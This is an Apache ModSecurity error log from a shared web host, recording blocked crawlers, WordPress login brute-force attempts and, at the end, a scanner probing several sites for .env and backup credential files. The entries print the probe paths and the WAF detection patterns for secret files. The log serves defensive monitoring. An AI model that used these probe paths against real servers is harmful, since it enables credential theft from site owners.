[Tue May 26 15:31:40.826524 2026] [security2:error] [pid 715645:tid 715821] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvhHVGgMGh8k213Rga5wAAAC4"]
[Tue May 26 15:31:43.913670 2026] [security2:error] [pid 715645:tid 715850] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvh3VGgMGh8k213RgbPQAAAEs"]
[Tue May 26 15:31:46.270707 2026] [security2:error] [pid 715645:tid 715810] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVviXVGgMGh8k213RgbkgAAACM"]
[Tue May 26 15:31:48.620833 2026] [security2:error] [pid 715645:tid 715778] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvjHVGgMGh8k213Rgb3gAAAAM"]
[Tue May 26 15:31:50.198813 2026] [security2:error] [pid 715645:tid 715847] [client 85.208.96.212:34458] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-4-8/list/"] [unique_id "ahVvjnVGgMGh8k213RgcFAAAAEg"]
[Tue May 26 15:31:50.198956 2026] [security2:error] [pid 715645:tid 715847] [client 85.208.96.212:34458] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-4-8/list/"] [unique_id "ahVvjnVGgMGh8k213RgcFAAAAEg"]
[Tue May 26 15:31:50.884689 2026] [security2:error] [pid 715645:tid 715839] [client 74.7.241.129:45522] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.mobile.cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVvjnVGgMGh8k213RgcKgAAQCs"]
[Tue May 26 15:31:51.042926 2026] [security2:error] [pid 715645:tid 715829] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvjnVGgMGh8k213RgcIgAAADY"]
[Tue May 26 15:31:51.275207 2026] [autoindex:error] [pid 715645:tid 715742] [remote 74.7.243.241:46872] AH01276: Cannot serve directory /home1/cicode9a/public_html/mobile/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:31:52.034026 2026] [security2:error] [pid 715645:tid 715816] [client 195.172.119.127:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVvj3VGgMGh8k213RgcNwAAACk"]
[Tue May 26 15:31:53.391569 2026] [security2:error] [pid 715645:tid 715883] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvkHVGgMGh8k213RgcYAAAAGw"]
[Tue May 26 15:31:55.221117 2026] [security2:error] [pid 715645:tid 715822] [client 146.174.178.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvknVGgMGh8k213RgcoQAAAC8"]
[Tue May 26 15:31:55.231975 2026] [security2:error] [pid 715645:tid 715863] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvknVGgMGh8k213RgcnwAAAFg"]
[Tue May 26 15:31:56.404511 2026] [security2:error] [pid 715645:tid 715823] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvlHVGgMGh8k213Rgc4AAAADA"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1285834&moderation-hash=8f2b10575238d96ad682605ac8878fdf
[Tue May 26 15:31:58.266725 2026] [security2:error] [pid 715645:tid 715871] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvlXVGgMGh8k213RgdEQAAAGA"]
[Tue May 26 15:31:59.055915 2026] [security2:error] [pid 715645:tid 715802] [client 180.102.110.175:53224] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahVvl3VGgMGh8k213RgdPgAAABs"]
[Tue May 26 15:31:59.056059 2026] [security2:error] [pid 715645:tid 715802] [client 180.102.110.175:53224] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahVvl3VGgMGh8k213RgdPgAAABs"]
[Tue May 26 15:32:00.264795 2026] [security2:error] [pid 715645:tid 715823] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvl3VGgMGh8k213RgdVwAAADA"]
[Tue May 26 15:32:01.283557 2026] [http2:info] [pid 724639:tid 724639] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:32:02.622117 2026] [security2:error] [pid 724639:tid 724826] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvmhKJRbiNp3eWdT1kbwAAAL4"]
[Tue May 26 15:32:03.423001 2026] [security2:error] [pid 724639:tid 724802] [client 152.57.51.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVvmxKJRbiNp3eWdT1kkQAAAKY"]
[Tue May 26 15:32:03.423532 2026] [security2:error] [pid 724639:tid 724784] [client 152.57.51.49:62100] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVvmxKJRbiNp3eWdT1kjwAAAJQ"]
[Tue May 26 15:32:03.643406 2026] [security2:error] [pid 724639:tid 724781] [client 138.59.206.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvmxKJRbiNp3eWdT1knQAAAJE"], referer: https://www.anujtradingco.com/
[Tue May 26 15:32:04.184612 2026] [security2:error] [pid 724639:tid 724650] [remote 42.116.123.127:31342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.123.116.42.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVvmxKJRbiNp3eWdT1kqgAAyQo"]
[Tue May 26 15:32:04.768946 2026] [security2:error] [pid 724639:tid 724812] [client 138.59.206.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvnBKJRbiNp3eWdT1kwQAAALA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 15:32:06.220420 2026] [security2:error] [pid 724639:tid 724797] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvnRKJRbiNp3eWdT1k4gAAAKE"]
[Tue May 26 15:32:07.810777 2026] [security2:error] [pid 724639:tid 724896] [client 176.88.124.91:6891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.124.88.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "chettinadavenue.com"] [uri "/wp-login.php"] [unique_id "ahVvnxKJRbiNp3eWdT1lJQAAAQQ"], referer: https://www.facebook.com/
[Tue May 26 15:32:08.299083 2026] [security2:error] [pid 724639:tid 724866] [client 176.88.124.91:7326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.124.88.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "chettinadavenue.com"] [uri "/wp-login.php"] [unique_id "ahVvoBKJRbiNp3eWdT1lRAAAAOY"], referer: https://duckduckgo.com/
[Tue May 26 15:32:09.735146 2026] [security2:error] [pid 724639:tid 724787] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvoRKJRbiNp3eWdT1laQAAAJc"]
[Tue May 26 15:32:10.819209 2026] [security2:error] [pid 724639:tid 724829] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvohKJRbiNp3eWdT1lhwAAAME"]
[Tue May 26 15:32:11.858780 2026] [security2:error] [pid 724639:tid 724821] [client 167.71.246.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahVvohKJRbiNp3eWdT1ljQAAALk"]
[Tue May 26 15:32:12.154077 2026] [security2:error] [pid 724639:tid 724889] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvoxKJRbiNp3eWdT1lrwAAAP0"]
[Tue May 26 15:32:14.403323 2026] [security2:error] [pid 724639:tid 724889] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvphKJRbiNp3eWdT1l8AAAAP0"]
[Tue May 26 15:32:16.378393 2026] [security2:error] [pid 724639:tid 724857] [client 114.119.156.126:52937] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVvqBKJRbiNp3eWdT1mNAAAAN0"], referer: http://haddingtonwines.com/cart?remove_item=ddd9dda6bfaf0bb1525a8a27c3ee6131
[Tue May 26 15:32:16.698849 2026] [security2:error] [pid 724639:tid 724880] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvqBKJRbiNp3eWdT1mLAAAAPQ"]
[Tue May 26 15:32:16.768226 2026] [security2:error] [pid 724639:tid 724786] [client 114.119.140.56:34287] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/php/blog/2019/10/"] [unique_id "ahVvqBKJRbiNp3eWdT1mPgAAAJY"], referer: https://www.plenitudotonal.com/php/blog/2019/10/
[Tue May 26 15:32:16.779154 2026] [security2:error] [pid 724639:tid 724877] [client 74.7.230.4:33714] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "srworldwide.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVvqBKJRbiNp3eWdT1mPwAA8UY"]
[Tue May 26 15:32:16.842394 2026] [security2:error] [pid 724639:tid 724831] [client 74.7.175.183:56520] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "srworldwide.in.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVvqBKJRbiNp3eWdT1mQAAAw0c"]
[Tue May 26 15:32:17.767596 2026] [security2:error] [pid 724639:tid 724798] [client 185.191.171.16:29078] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahVvqRKJRbiNp3eWdT1mZAAAAKI"]
[Tue May 26 15:32:17.767746 2026] [security2:error] [pid 724639:tid 724798] [client 185.191.171.16:29078] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahVvqRKJRbiNp3eWdT1mZAAAAKI"]
[Tue May 26 15:32:17.900306 2026] [security2:error] [pid 724639:tid 724732] [remote 195.250.23.247:40940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVvqRKJRbiNp3eWdT1mXQAAo1w"]
[Tue May 26 15:32:18.457280 2026] [security2:error] [pid 724639:tid 724836] [client 165.16.180.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvqhKJRbiNp3eWdT1mdAAAAMg"]
[Tue May 26 15:32:19.252733 2026] [security2:error] [pid 724639:tid 724886] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvqhKJRbiNp3eWdT1mgAAAAPo"]
[Tue May 26 15:32:20.207365 2026] [security2:error] [pid 724639:tid 724720] [remote 79.143.178.15:34996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVvrBKJRbiNp3eWdT1mnwAAhVA"]
[Tue May 26 15:32:21.128218 2026] [security2:error] [pid 724639:tid 724822] [client 123.19.120.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvrBKJRbiNp3eWdT1mrwAAALo"]
[Tue May 26 15:32:22.026823 2026] [security2:error] [pid 724639:tid 724798] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvrRKJRbiNp3eWdT1m3AAAAKI"]
[Tue May 26 15:32:23.040328 2026] [security2:error] [pid 724639:tid 724796] [client 74.7.175.131:60894] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.amdsi.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVvrxKJRbiNp3eWdT1nBAAAoFs"]
[Tue May 26 15:32:23.135295 2026] [security2:error] [pid 724639:tid 724775] [client 74.7.244.12:50852] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.amdsi.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVvrxKJRbiNp3eWdT1nCAAAi10"]
[Tue May 26 15:32:23.930027 2026] [security2:error] [pid 724639:tid 724895] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvrxKJRbiNp3eWdT1nEgAAAQM"]
[Tue May 26 15:32:24.211227 2026] [security2:error] [pid 724639:tid 724837] [client 85.11.167.19:49450] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "katalystconsulting.svijaykumar.in"] [uri "/.env"] [unique_id "ahVvsBKJRbiNp3eWdT1nJAAAAMk"]
[Tue May 26 15:32:25.059406 2026] [security2:error] [pid 724639:tid 724817] [client 85.11.167.19:49452] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "katalystconsulting.svijaykumar.in"] [uri "/"] [unique_id "ahVvsRKJRbiNp3eWdT1nNwAAALU"]
[Tue May 26 15:32:26.231714 2026] [security2:error] [pid 724639:tid 724799] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvsRKJRbiNp3eWdT1nUwAAAKM"]
[Tue May 26 15:32:26.238638 2026] [security2:error] [pid 724639:tid 724640] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env"] [unique_id "ahVvshKJRbiNp3eWdT1nXwAA9gA"]
[Tue May 26 15:32:26.250876 2026] [autoindex:error] [pid 724639:tid 724754] [remote 195.178.110.199:46950] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:26.329230 2026] [security2:error] [pid 724639:tid 724759] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVvshKJRbiNp3eWdT1naAAAxXc"]
[Tue May 26 15:32:26.385966 2026] [security2:error] [pid 724639:tid 724645] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVvshKJRbiNp3eWdT1nbwAAywU"]
[Tue May 26 15:32:26.386944 2026] [security2:error] [pid 724639:tid 724762] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVvshKJRbiNp3eWdT1ncQAAy3o"]
[Tue May 26 15:32:26.526431 2026] [security2:error] [pid 724639:tid 724652] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env"] [unique_id "ahVvshKJRbiNp3eWdT1neAAA_Qw"]
[Tue May 26 15:32:26.531588 2026] [security2:error] [pid 724639:tid 724650] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVvshKJRbiNp3eWdT1newAA_Qo"]
[Tue May 26 15:32:26.532591 2026] [security2:error] [pid 724639:tid 724654] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVvshKJRbiNp3eWdT1nfAAA_Q4"]
